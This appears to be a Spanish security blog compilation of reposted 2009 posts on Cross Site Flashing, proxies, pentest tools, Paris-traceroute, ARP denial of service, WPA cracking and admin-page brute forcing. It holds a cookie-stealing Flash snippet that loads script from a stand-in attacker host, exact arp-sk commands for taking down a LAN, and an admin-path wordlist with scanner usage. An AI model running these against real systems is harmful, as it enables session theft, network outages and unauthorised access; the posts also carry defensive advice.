31 ago 2009

XSF - Cross Site Flashing

Supongo que nuestros lectores habrán oido hablar del gusano que afectó a la red social Twitter allá por el mes de abril. De hecho, Laura publicó un artículo sobre la contratación del creador del mismo aquí. El ataque consistía en que gracias a una vulnerabilidad del tipo XSS (Cross-Site Scripting) permitía suplantar la identidad de un montón de usuarios atacados y twittear desde su cuenta.

En este caso, el objetivo de los ataques ha sido la red social china Renren. Para ello se ha utilizado una variante de ataque XSS encapsulado mediante archivos Flash. Como resultado, este ataque se ha llamado XSF o Cross Site Flashing.

¿Cómo se llevó a cabo el ataque?
La red social Renren permite, al igual que otras como Facebook o Tuenti, permite compartir contenido multimedia. Para ello se puede hacer mediante videos o en formato Flash. Para este último, el enlace a un fichero SWF, se hace mediante una función llamada playswf() que crea una porción de código así:
<embed src=”"+o.filename+”” type=”application/x-shockwave-flash”

“+”width=”"+(o.width||”320″)+”” height=”"+(o.height||”240″)+”” allowFullScreen=”true”

wmode=”"+(o.wmode||”transparent”)+”” allowScriptAccess=”always” ></embed>

Atención especial merece el parámetro "allowScriptAccess". Gracias a él se limita el nivel de acceso que el objeto "embebido" tendrá sobre el resto de la página HTML. Si se asigna "allowScriptAccess=sameDomain" el objeto flash, sólo tendrá acceso a la página HTML si se llama desde el mismo dominio, haciendo falta que el atacante subiera el fichero a ejecutar al mismo dominio, utilizando alguna otra técnica.
Sin embargo, en condiciones en las que el parámetro allowScriptAccess tenga el valor "always", el objeto flash tiene acceso a cualquier parte de la sesión HTML, como por ejemplo, las cookies. 1, 2, 3,... responda otra vez: Las Cookies.

A partir de aquí el resto del ataque consiste en crear un objeto flash en el que se pueda incluir en el fichero Flash una porción de código que ejecute un Javascript malicioso que envíe las cookies de los usuarios que vean ese "inocente" flash a una localización remota. A partir de ahí el atacante contará con acceso a la identidad de un montón de usuarios.

Por ejemplo,

var fun = 'var x=document.createElement("SCRIPT");x.src="http://www.delatacante.com/malicioso.js"; x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';

    flash.external.ExternalInterface.call('eval', fun);

Asimismo, el usuario final verá el flash sin saber que ha ejecutado código Javascript malicioso robando su cookie.

El ataque a la red social Renren, además consistía en aprovechar las credenciales del individuo para enviar el video a todos sus contactos.

Como podéis ver, XSS encapsulado en un objeto Flash embebido en una página web... gracias a excesivos permisos para ese objeto. Recomendación, si tenéis algún tipo de sitio web que permita compartir este tipo ficheros, forzad el parámetro "allowScriptAccess" a "samedomain".

Fuente: http://www.securitybydefault.com/

¿Qué son los servidores proxy y como trabajan?


Un servidor proxy (algunas veces se hace referencia a el con el nombre de "gateway" - puerta de comunicación o "forwarder" - agente de transporte -), es una aplicacion que media en el tráfico que se produce entre una red protegida e Internet. Los proxies se utilizan a menudo, como sustitutorios de routers controladores de tráfico, para prevenir el tráfico que pasa directamente entre las redes. Muchos proxies contienen logines auxiliares y soportan la autentificación de usuarios. Un proxy debe entender el protocolo de la aplicación que está siendo usada, aunque también pueden implementar protocolos específicos de seguridad (por ejemplo: un proxy FTP puede ser configurado para permitir FTP entrante y bloquear FTP saliente).

Los servidores proxy, son aplicaciones específicas. Un conjunto muy conocido de servidores proxy son los TIS Internet Firewall Toolkit "FWTK", que incluyen proxies para Telnet, rlogin, FTP, X-Windows, http/Web, y NNTP/Usenet news. SOCKS es un sistema proxy genéricos que puede ser compilado en una aplicación cliente para hacerla trabajar a través de una firewall.

Fuente: http://informatica-full2.blogspot.com/

30 ago 2009

Fast-Track: Pentesting a la velocidad de la luz

Todos los que nos dedicamos a la seguridad y más concretamente a hacer Pentesting sabemos del poco tiempo que disponemos cuando nos ponemos a auditar la red de una empresa, todos acabamos haciendonos nuestros scripts o nuestros programitas (en la medida de lo posible) para conseguir automátizar cuantas más cosas mejor, para así disponer de más tiempo para aquellas que requieren sencillamente pararse a pensar y echarle imaginación.

Parace que lo mismo le ha sucedido a David Kennedy, ex-NSA, actualmente trabajando en la empresa SecureState, que ha desarrollado un script en python llamado Fast-Track que pretende automatizar algunas tareas muy interesantes a la hora de realizar un test de intrusión (de hecho fijaros en el nombre de la web, parecido al de esta).

Este script está ya en las manos de los usuarios de BackTrack, ya que Dave es colaborador habitual de esta distribución. Para utilizarlo sólo es necesario entrar en el directorio /pentest/exploits y lanzarlo con las opciones deseadas "-i" para modo interactivo por linea de comandos, "-g 80" para lanzar un servidor web al que conectar a http://localhost y seleccionar las opciones deseadas de forma gráfica.

# cd /pentest/exploits
# ./fast-track.py -g 80

(en otra ventana)

# firefox http://localhost


Además, en la web de Fast-Track existen excelentes tutoriales de demostración en video que muestran como utilizar cada una de las opciones de esta herramienta.

De entre todas ellas, a mi hay dos que me resultan especialmente interesantes, ya que realiza de forma automática la detección del sistema, selección de los exploits que le podrían afectar, y los prueba, lo que ahorra mucho tiempo:
  • Fast-Track Autopwnage: Esta opción realiza de forma automática un escaneo de puertos con NMAP para posteriormente utilizar Metasploit, seleccionando únicamente los exploits adecuados a los puertos que se han descubierto como abiertos. Una forma muy rápida de encontrar agujeros directamente explotables a través de Metasploit.
  • Fast-Track Mass Client Attack: Levanta un servidor web que, tras realizar un ataque MitM que deberemos realizar de forma manual, (otro día escribiré algo sobre eso) realiza una detección de la versión del navegador utilzada por el cliente y le develve en la contestación a su petición los exploits que podrían explotar vulnerabilidades de su navegador. En el ejemplo vemos como explota una vulnerabilidad y obtiene un acceso mediante VNC.
Para más videos y posibilidades, os invito a visitar la web de la herramienta.
Sin duda una herramienta excepcional, que nos va a permitir agilizar mucho nuestro trabajo.
A disfrutarla!

Fuente: http://www.pentester.es/

Manual de Hacking Básico

Bien... andando por lo la web me encuentro con un manual de "Hacking Básico" hecho por taskkill#, el manual no es nada del otro mundo ni mucho menos, pero es bastante bueno para aquellos que comienzan con esto de la (In)Seguridad informática.

El PDF trata de:
  • Comandos Básicos en Windows.
  • Protocolo FTP
  • Protocolo TFTP
  • Proxies
  • Como funciona el anonimato en un proxy HTTP
  • Troyanos, Backdoors, Keyloggers y Worms
  • Defacement
  • Scanner de Vulnerabilidades
  • Pasos a seguir para Penetración a un sistema, Penetración testing o Hacking
  • ¿Qué hacer cuando se tiene una shell de un sistema?
Como ven  de todo un poco pero no muy a fondo... Sin duda un buen manual para quienes empiezan.

Descarga (Directa)
Descarga MEGAUPLOAD
Descarga RapidShare

Autor: taskkill#

Paris-Traceroute: Cómo buscar todas las posibles rutas de red entre un origen y un destino

Tracerouter es una utilidad muy conocida y utilizada para realizar diagnósticos básicos de redes, la herramienta permite visualizar la ruta a un host destino identificando los routers (saltos) por los que pasan los paquetes. El problema es que esta aplicación es tan popular como primitiva y en determinadas situaciones no da información veraz sobre las rutas utilizadas por el tráfico de red.
En la actualidad la gran mayoría de redes no tienen una topología lineal, lo habitual es encontrar routers con varias interfaces de red y en consecuencia varias rutas para alcanzar el destino, estas variaciones de rutas se aprecian muy bien cuando probamos trazas en Internet, la red de redes. Uno de los motivos principales para usar el balanceo de carga es evitar en la medida de lo posible los cuellos de botella, sobre todo al interconectar una red con otra. La implementación de este tipo de topologías de red no lineales impide al comando tracerouter y derivados visualizar una ruta al destino de forma acertada, veamos con algunos ejemplos simples donde recae el problema y qué consecuencias puede provocar.


Como se puede ver en la imagen, tracerouter muestra una traza entre origen y destino que es completamente falsa además de imposible, ya que como se puede ver en el esquema el router "A" y el router "D" no están interconectados. Este tipo de problemas se produce debido a los balanceos de tráfico que realiza el router "L" y la forma de trabajar que tiene tracerouter. Al haber dos routers alcanzables con TTL 8, la visualización del camino a seguir depende de la configuración del enrutador y la interfaz que utilice para enviar el paquete, las posibles rutas que podría mostrar tracerouter serían las siguientes:
L A C E --> Ruta correcta
L A D E --> Ruta errónea y falsa
L B C E --> Ruta errónea y falsa
L B D E --> Ruta Correcta
Otra falla que puede ocasionar el uso de tracerouter con las topologías de red actuales son los bucles, en algunas ocasiones podemos ver que la traza nos muestra la misma IP en dos saltos consecutivos, como si el tráfico pasara dos veces por el mismo enrutador. Este esquema de red que presentamos a continuación fuerza la creación de bucles en la salida de tracerouter.



Si una primera traza identifica el camino "L A E" y se dispone a descubrir el nodo siguiente, traceroute tendrá que usar un TTL de 8 en la petición, pero si el router "L" encamina ese paquete por la otra interfaz, recorrerá" L B C" e informará de que el siguiente nodo es "E", apareciendo dos veces el mismo router (E) en la salida. Como vemos es inservible en determinados escenarios ya que no puede identificar un único recorrido de entre muchos. La necesidad de crear una herramienta como tracerouter que se adapte a este tipo de situaciones fue la motivación de un grupo de franceses para crear Paris-tracerouter.
Paris traceroute es una nueva versión de tracerouter que permite hacer diagnósticos en redes que utilizan determinados balanceos de carga, permitiendo identificar la ruta correcta que siguen los paquetes para llegar a un destino concreto. También implementa un algoritmo MDA (Multipath Detection Algorithm) de identificación de rutas que busca todos los caminos alternativos posibles a un destino, una herramienta muy útil para crear mapas de red partiendo del desconocimiento total de la topología en uso. La mayoría de balanceos de carga que podemos encontrar en redes se hacen por flujo, una forma más inteligente y optima que el típico balanceo de carga por paquete.
Mejoras que implementa Paris traceroute:
- Para forzar a los enrutadores a que no realicen balanceo de carga y así identificar rutas únicas al destino, paris traceroute no cambia el puerto destino a cada salto. El tracerouter nativo suma +1 al puerto destino cuando pasa de un router a otro, esto provoca que cada solicitud pueda salir por otra interfaz del router debido a un cambio en las cabeceras, que es lo utilizado por la mayoría de balanceadores para batir el tráfico.
- Cuando se trata de averiguar todas las posibles rutas de red a un destino, paris traceroute envía multitud de paquetes para enumerar las posibles interfaces activas que tienen los routers de cada salto, esto lo realiza cambiando el puerto para forzar balanceos de rutas y descubrir los distintos caminos.
- Para cada salto (Router) paris traceroute realiza las mismas pruebas para encontrar todas las posibles rutas.
- Permite identificar qué routers balanceen por flujo y cuales por paquetes, para identificar balanceadores por paquete vale con enviar solicitudes sin variar las cabeceras, si no se cambia el puerto de ningún paquete y cada uno va por una ruta distinta al anterior es que hay un balanceo de carga por paquete en alguno de los nodos.
- Implementa opciones que dan más flexibilidad a la hora de personalizar las trazas (Puertos destino y origen, TTL, pruebas NBR, hilos,..), Otra cualidad es la de poder utiilizar el protocolo TCP para realizar trazas, pudiendo de esta forma saltar alguna restricción del tipo ICMP /UDP. De usar el protocolo TCP o UDP para realizar trazas es recomendable utilizar puertos destino típicos para evitar posibles filtrados, como son los puertos 80 (Web), 53 (DNS) , 21 (FTP), 22 (Ssh), 23 (Telnet), 69 (TFTP),..
Prueba de concepto
Para forzar balanceos de carga y obtener distintas salidas con tracerouter, lo mejor es lanzar el comando numerosas veces y observar las diferentes contestaciones de tracerouter para localizar nuevos nodos. Si nos fijamos en el salto número 5 del siguiente recuadro se pueden ver las distintas salidas que hemos obtenido después de realizar siete trazas a la IP 64.208.27.17


$ traceroute 64.208.27.17

1 192.168.1.1 (192.168.1.1) 1.182 ms 1.127 ms 0.958 ms
2 192.168.153.1 (192.168.153.1) 372.930 ms 451.009 ms 510.376 ms
3 17.Red-81-46-53.staticIP.rima-tde.net (81.46.53.17) 569.647 ms 498.206 ms 333.300 ms
4 (84.16.9.161) 355.540 ms 394.629 ms 385.075 ms
5 (213.140.36.122) 379.903 ms (84.16.15.194) (213.140.43.214) 543.741 ms
5 (84.16.15.194) 482.889 ms (213.140.36.122) (84.16.15.194) 380.475 ms
5 (84.16.15.194) 357.923 ms (213.140.43.214) 506.987 ms 647.253 ms
5 (213.140.43.214) 429.878 ms (84.16.15.194) 561.764 ms *
5 (213.140.43.214) 535.769 ms * (213.140.36.122) 506.999 ms
5 (213.140.36.122) 82.537 ms (84.16.15.194) 90.342 ms (213.140.43.214) 87.862 ms
5 (84.16.15.194) 36 bytes to 192.168.1.33 89.103 ms (213.140.43.214) 36 bytes to 192.168.1.33 86.784 ms 85.764 ms
6 64.208.27.17 (64.208.27.17) 710.751 ms 657.222 ms 393.903 ms

Como se puede observar, después del nodo 84.16.9.161 el tráfico puede seguir distintas rutas (213.140.36.122, 84.16.15.194 y 213.140.43.214), ahora vamos a ver un ejemplo con paris-tracerouter.
Localizar todas las rutas posibles a 64.208.27.17 con paris-traceroute

# paris-traceroute -n --algo=exhaustive 64.208.27.17
traceroute [(192.168.1.33:33456) -> (64.208.27.17:33457)], protocol udp, algo exhaustive, duration 32 s
1 P(6, 6) 192.168.1.1 1.513/1.738/2.699/0.431 ms
2 P(6, 6) 192.168.153.1 43.045/49.696/79.788/13.466 ms
3 P(6, 6) 81.46.53.17 43.059/43.783/44.958/0.637 ms
4 P(6, 6) 84.16.9.161 57.425/58.147/58.764/0.502 ms
5 P(21, 21) 213.140.36.122:0,1,4,9,13,14,15 80.248/83.209/87.437/2.552 ms
213.140.43.214:2,5,8,10 81.515/82.006/82.505/0.399 ms
84.16.15.194:3,6,7,11,12 85.858/89.115/91.139/2.251 ms
6 P(5, 6) 64.208.27.17 87.764/107.427/178.720/35.677 ms 

A diferencia del traceroute normal, la aplicación paris-traceroute ha identificado esas posibles rutas perfectamente con un solo comando, haciendo posible obtener un mapa de red coherente en poco tiempo y con muy poco margen de error. Como dijimos anteriormente los balanceadores de carga por flujo se basan en las cabeceras, para comprobar el tipo de balanceo de red o estudiar el comportamiento de los routers, podemos probar manualmente variaciones de puerto o protocolo a un mismo destino y observar las salidas a ver que información muestran.
Nodo número 5: Dos trazas TCP (22, 80) + Una traza UDP normal
# paris-traceroute -p tcp -d 22 -n 64.208.27.17 | grep -i "5 "
5 213.140.43.214 81.670 ms 81.559 ms 81.355 ms
# paris-traceroute -p tcp -d 80 -n 64.208.27.17 | grep -i "5 "
5 213.140.36.122 82.790 ms 81.691 ms 87.288 ms
# paris-traceroute -n 64.208.27.17 | grep -i "5 "
5 84.16.15.194 86.669 ms 86.525 ms 86.306 ms
Al enviar tres tipos de flujos distintos se han obtenido las tres rutas, por lo que suponemos una batida de tráfico de red por flujo.
Traceroute en linea / Looking Glasses
- http://www.traceroute.org/
- http://www.nexthop.net/traceroute.html
- http://lgb.ri.telefonica-data.net/en/ (Loking glass Telefonica)
Vídeo de la conferencia sobre Paris-tracerouter (Francés): Paris-tracerouter.flv

FUENTE: http://www.busindre.com/

Los hackers prefieren Firefox y Opera

Nuevas investigaciones muestran que los hackers prefieren usar navegadores con una instalación base menor.

Firefox y Opera parecen ser los navegadores elegidos por los hackers para navegar por sitios Web que usan para lanzar ataques de malware, de acuerdo con una nueva investigación.

Paul Royal, un investigador de seguridad con el proveedor de servicios Web Purewire, informó haber obtenido datos después de infiltrarse en herramientas usadas por los hackers para llevar estos ataques, como LuckySploit y UniquePack.

La investigación encontró que el 46 por cierto de los hackers usan Firefox, mientras que sorpresivamente Opera es segundo con 26 por ciento, a pesar de tener solo dos por ciento de la cuota de mercado.

Irónicamente, los hackers están usando navegadores con un bajo nivel de mercado para evitar ser ellos mismos hackeados, de acuerdo con Rik Ferguson, asesor senior de seguridad en Trend Micro.

"No quieren comprometerse ellos mismos", dijo él. "Tienen mucho que perder - las ganancias de sus operaciones criminales, control de botnets y más - así que buscan cuidarse a ellos mismos".

Sin embargo, Ferguson advirtió que Firefox y Opera no son intrínsecamente más seguros que Internet Explorer de Microsoft u otros navegadores, solo que dejan un rastro más pequeño y no atraen tanto la atención de los autores de malware.

Como ejemplo, la versión 9.x de Opera actualmente tiene 22 boletines de seguridad contra él y 50 vulnerabilidades, 68 por ciento de ellas altamente críticas, de acuerdo con la información más reciente de la firma de escaneo de vulnerabilidades de seguridad Secunia.


29 ago 2009

httprecon, Identificación de Servidores Web

Aunque el término original del artículo es Fingerprinting, que traducido literalmente es “toma de huellas digitales”, he preferido darle la interpretación de Identificación Avanzada, ya que el objetivo principal de la herramienta es identificar en un alto porcentaje el servidor web que gestiona una página Web objetivo.
El proyecto httprecon investiga en el campo del Fingerprinting Web, tarea que exige identificar de manera casi exacta el servidor Web de una página en específico u objeto de análisis. Tema de especial importancia para análisis profesionales y detección de vulnerabilidades Web.
Además de la exactitud de los resultados de los análisis, la herramienta cuenta con varios recursos informátivos que ofrecen metodologías para llevar a cabo este tipo de identificaciones.
La herramienta mejorará y hará más eficiente el proceso de enumeración e identificación de objetivos, mediante técnicas de identificación de banners, estado del código y encabezados.

Está programado en VisualBasic 6 y es de código abierto, además de que se pueden ver los datos que utiliza.

Links:
FAQ
Documentación de la herramienta httprecon
Descargar la herramienta httprecon
Web oficial del proyecto httprecon
Más información (fuente) de la herramienta httprecon (inglés)


En resumen: httprecon es un programa para Windows que permite analizar e identificar que servidor http esta corriendo un objetivo. Analiza los banners, códigos de error devueltos, el orden de las cabeceras, etc.

Fuentes:
http://www.dragonjar.org/
http://0verl0ad.blogspot.com/

Cómo tirar abajo una red LAN / Wifi casera en pocos segundos (Arp DoS)

En la actualidad, la mayoría de conexiones a Internet para al hogar y pequeña oficina que los distintos ISP ofrecen a sus clientes, se basan en aparatos que aunque denominados routers, son la suma de un enrutador, un switch (Conmutador) y un punto de acceso Wireless, todo en uno. Esto facilita que con un solo dispositivo se pueda ofrecer de forma simple y económica un acceso a Internet y red a más de un usuario por linea contratada. Los proveedor de servicios de Internet ofrecen este tipo de dispositivos con una configuración predeterminada insegura, esto se debe a que la mayoría de usuarios de Internet son inexpertos y los dispositivos no pueden implementar medidas que dificulten al cliente la configuración y acceso a la red, motivo por el cual la mayoría de redes y conexiones a Internet que encontramos en hogares y pequeñas oficinas son consideradas como poco seguras.

Lo que venimos a demostrar en este post es lo simple que resulta producir una denegación de servicio en este tipo de dispositivos de red utilizando únicamente la capa de enlace. No explicaremos el protocolo ARP en detalle, se da por supuesto que el lector tiene un conocimiento básico sobre este protocolo y su funcionamiento. Para generar un DoS que impida a los clientes de una determinada red acceder al router, usaremos algo tan viejo y conocido como es el envenenamiento ARP, nosotros proponemos la siguiente estrategia, pero no es la única que podemos utilizar, hay otras formas de realizar denegaciones de servicio utilizando en la capa de enlace.
  • Inundar la red con respuestas falsas que contesten a solicitudes ARP que pregunten por la MAC del gateway.
  • Envenenar la tabla ARP del router para que asocie la MAC del gateway a la boca del router donde estemos conectados.
La capa de enlace obliga a que cualquier cliente que quisiera salir a Internet debe tener guardada la dirección física del router en su tabla ARP, para obtener esa dirección se inunda la red enviando paquetes "ARP request" a la dirección de broadcast (FF:FF:FF:FF:FF:FF) preguntando por la MAC del enrutador. Por lo tanto, si inundamos de respuestas falsas la red, indicando que la dirección física vinculada a la ip del router 192.168.1.1 es "AA:BB:CC:AA:BB:CC", el cliente que quiera salir a Internet recibirá antes la respuesta falsa que la correcta devuelta por el enrutador, quedando su tabla ARP envenenada y en consecuencia sin acceso a Internet.

La propiedad de conmutador de los routers actuales les obliga a guardar una tabla con las direcciones MAC que tiene cada equipo y a que boca está conectado. Para fortalecer un poco más el ataque y hacerlo más eficiente, recomendamos realizar un envenenamiento ARP simultaneo que indique que la MAC real del router está vinculada a la boca desde la que se está lanzando el ataque. De esta forma envenenamos la tabla ARP del enrutador y si algún cliente consiguiera obtener la dirección MAC real del router, tampoco sería capaz de salir a Internet.

Hay muchos tipos de routers en el mercado y no todos reaccionan de la misma manera antes las denegaciones de servicio, pero la inmensa mayoría de dispositivos no profesionales ceden ante este tipo de ataques en la capa de enlace, tanto si se realiza desde una conexión cableada como desde una inalámbrica, algunos dispositivos incluso se cuelgan al recibir este tipo de denegación de servicio. La herramienta que nos permite realizar este ataque de una forma simple y con un solo comando es Arp-sk, considerada la "navaja suiza" del protocolo ARP.

Sintaxis utilizada para este ataque DoS:
# arp-sk -T u0  -r -i TARJETA -S IP_ROUTER:MAC_INVENTADA -s MAC_DEL ROUTER

Escenario de ejemplo:
  • Router: 192.168.1.1 / 00:01:38:68:D4:D8
  • Cliente: 192.168.1.33 / 00:0E:2E:C5:7B:70
  • Atacante: 192.168.1.33 / 00:18:39:BB:F0:3A
Comando del atacante en relación al escenario planteado:
# arp-sk -T u1  -r -i eth0 -S 192.168.1.1:AA:BB:CC:AA:BB:CC -s 00:01:38:68:D4:D8

Opciones de Arp-sk en uso:
-T u1 -> Envía paquetes dejando un periodo de tiempo de 1 microsegundo entre paquete y paquete.
-r -> Manda respuestas ARP (ARP Reply) que configuramos con la opción -S.
-i eth0 -> Permite especificar la interfaz con la que trabajaremos, puede realizarse con tarjetas wifi.
-S 192.168.1.1:AA:BB:CC:AA:BB:CC -> Dirección IP y MAC falseada de nuestras respuestas (ARP Reply).
-s 00:01:38:68:D4:D8 -> Dirección MAC origen, nos ayuda a que se asocie la MAC del router a la boca donde tenemos conectado nuestro cable.

La opción "-s" obliga a que todos los paquetes salientes de "Arp-sk" utilicen como origen la MAC indicada, pero si el atacante visita una determinada web o alguna aplicación conecta a Internet durante la prueba de concepto, la tarjeta usará la dirección física real, por lo que en algunas ocasiones puede ser recomendable cambiar temporalmente la MAC de nuestra interfaz a nivel global, para ello podemos usar la herramienta "ifconfig".

Cambiar la dirección física de nuestra tarjeta de red.
# ifconfig eth0 down
# ifconfig eth0 hw ether 00:01:38:68:D4:D8
# ifconfig eth0 up

Orientando la denegación de servicio hacia un host específico

Con este comando inundamos la red de respuestas ARP que vinculan la la IP de la victima con una dirección física falsa, a la vez que engañamos a la tabla ARP del router para que vincule la dirección MAC de la victima a nuestra boca del router.

# arp-sk -T u0 -r -i TARJETA -S IP_VICTIMA:MAC_INVENTADA -s MAC_VICTIMA

Otra opción que produce menos tráfico sería la siguiente, con este comando enviamos respuestas ARP que envenenan la tabla de la victima vinculando la IP del router a una dirección MAC inexistente. La opción "-d" nos permite especificar el destino de nuestro ataque y de esta forma evitar el broadcast.
# arp-sk -T u0 -r -i TARJETA -S IP_ROUTER:MAC_INVENTADA -d MAC_VICTIMA

Consultar y borrar la tabla ARP desde GNU/Linux

Consultar entradas ARP de la tabla

# arp -a

Borrar entrada de la tabla ARP

# arp -d 192.168.1.1

¿Cómo evitar / detectar este tipo de ataques ARP DoS?

Fabricantes:
  • Implementación de sistemas como DHCP snooping.
  • Facilitar mecanismos de seguridad que solo permitan utilizar la primera MAC conectada al router/switch.
  • Comprobar que la MAC origen y la anunciada en un paquete ARP Reply son las mismas.
  • Impedir que la funcionalidad de switch permita falsear la MAC de la puerta de enlace.
Usuario:
  • Usar Tablas ARP estáticas.
  • Uso de aplicaciones tipo Arpwatch y Arpalert.
  • Comprobar indicios de ARP Spoofing mediante RARP (ARP inverso), si ante una consulta, RARP devuelve más de una dirección IP, significa que esa dirección MAC ha sido clonada.
Conceptos:
ARP Who-has = ARP Request.
Router = Gateway = Puerta de enlace predeterminada = Enrutador.
Switch = Conmutador.
Dirección física = Dirección MAC = Dirección de capa 2.

Fuente: http://foro.latinohack.com/

[+] ZioneR
[+] Salu2

Crackean el sistema de cifrado WPA en 1 minuto

Un grupo de investigadores japoneses han desarrollado un procedimiento por medio del cual, en sólo 60 segundos, pueden vulnerar el cifrado WPA que se utiliza actualmente en la mayoría de las redes inalámbricas.

Recordemos que hacia fines del año pasado, investigadores ya habían logrado romper este sistema de cifrado, pero tardaban 15 minutos en lograr su objetivo.

Los investigadores Toshihiro Ohigashi (de la Universidad de Hiroshima) y Masakatu Morii (de la Universidad de Kobe), publicaron un paper donde dan a conocer algunos detalles de la forma como logran vulnerar el sistema.

Ambos investigadores realizarán una demostración práctica de esta vulnerabilidad en una conferencia que se realizará el próximo 25 de Septiembre en la ciudad de Hiroshima.

Fuente: www.FayerWayer.com

Scripts en Perl y Python para buscar mediante fuerza bruta páginas de login

Scripts escritos en Python y Perl para realizar ataques de fuerza bruta con el objetivo de averiguar las URL de acceso al panel de administración de un determinado sitio web (Admin Page Finder).

Servicios en Linea:
http://mormoroth.net/af/
http://4dm1n.houbysoft.com/ (Código fuente disponible)

Script en Python

Descargar Admin-scan.py

Sintaxis de uso:
$ python admin-scan.py IP/Dcominio


Ejemplo:
/wp-login.php 404 Not Found
/admin.php 200 OK <------------------- 
/admin/ 404 Not Found 
/administrator/ 404 Not Found 
/moderator/ 404 Not Found


NOTA: Para personalizar la lista de rutas que utiliza el script debemos editar la variable "admin_path" del script.

Script en Perl

El script "Jasakomtool.pl" además de ataques de fuerza bruta para conseguir ubicar la página de acceso a la administración de una determinada web, permite realizar sencillos escaneos de puerto y obtener información mediante "banner grabbing" de los servicios Ftp,Ssh, Telnet, Smtp,Http,Pop3 y Mysql.

Descargar Jasakomtool.pl

Búsqueda mediante fuerza bruta la página de administración de la web (Login page)

Se debe tener en la misma ruta del script un fichero "admin.txt" con las rutas que nos interese.

Sintaxis:
$ perl jasakomtool.pl -admin Dominio/IP Puerto_inicial Puerto_final


Ejemplo:
$ perl jasakomtool.pl -admin http://www.dominio.com

Guessing Admin login page of http://www.dominio.com:
-----------------------------------------
Testing for url:http://www.dominio.com/admin1.php Result:404 Not Found
Testing for url:http://www.dominio.com/admin1.html Result:404 Not Found
Testing for url:http://www.dominio.com/admin2.php Result:404 Not Found
Testing for url:http://www.dominio.com/admin2.html Result:404 Not Found
Testing for url:http://www.dominio.com/wp-login.php Result:200 OK <------------------ ## :-)
Testing for url:http://www.dominio.com/yonetim.php Result:404 Not Found
Testing for url:http://www.dominio.com/yonetim.html Result:404 Not Found
Testing for url:http://www.dominio.com/yonetici.php Result:404 Not Found


Escaneo de puertos:

Sintaxis:
$ perl jasakomtool.pl -portscan Dominio/IP Puerto_inicial Puerto_final


Ejemplo:
$ perl jasakomtool.pl -portscan www.dominio.com 21 110

Scanning open ports on www.dominio.com from port 21 s/d 110
____________________________________________________________________
Port 21 on www.dominio.com is open !!! w00t !
Port 22 on www.dominio.com is open !!! w00t !
Port 25 on www.dominio.com is open !!! w00t !
Port 53 on www.dominio.com is open !!! w00t !
Port 80 on www.dominio.com is open !!! w00t !
Port 106 on www.dominio.com is open !!! w00t !
Port 110 on www.dominio.com is open !!! w00t !
____________________________________________________________________
Not Shown: 82 closed ports on www.dominio.com from port 21 until 110


Obteniendo información (Banner grabbing)

Busca las versiones de las aplicaciones Ftp,Ssh, Telnet, Smtp,Http,Pop3 y Mysql mediante Banner grabbing (Conectando al puerto y obteniendo el banner que muestre el servicio). Podemos usar la IP o el dominio del servidor a escanear.

Sintaxis / Ejemplo:
$ perl jasakomtool.pl -getinfo www.dominio.com
Daemon informations from common ports: 21,22,23,25,80,110 and 3306:

Daemon response (info) from port 21 (ftp daemon):
220 ProFTPD 1.3.1 Server (ProFTPD) [89.18.229.113]
_______________________________________________
Daemon response (info) from port 22 (ssh daemon):
SSH-2.0-OpenSSH_4.3
_______________________________________________
Daemon response (info) from port 25 (smtp daemon):
220 srv01.seidonet.com ESMTP
_______________________________________________
Daemon response (info) from port 80 (httpd):
Apache/2.2.3 (CentOS) Server at default Port 80

Important! You can see informations such as: web server version,ssl version,php version,perl version
_______________________________________________
Daemon response (info) from port 110 (pop3 server):
+OK Hello there. <[email protected]>
_______________________________________________
Daemon response (info) from port 3306 (mysql daemon):
4
5.0.22FKZE)=7:^K,<*]w]NLt#OFN


Fichero: admin.txt
admin1.php
admin1.html
admin2.php
admin2.html
yonetim.php
yonetim.html
yonetici.php
yonetici.html
ccms/
ccms/login.php
ccms/index.php
maintenance/
webmaster/
adm/
configuration/
configure/
websvn/
admin/
admin/account.php
admin/account.html
admin/index.php
admin/index.html
admin/login.php
admin/login.html
admin/home.php
admin/controlpanel.html
admin/controlpanel.php
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/


Fuente: http://www.busindre.com/

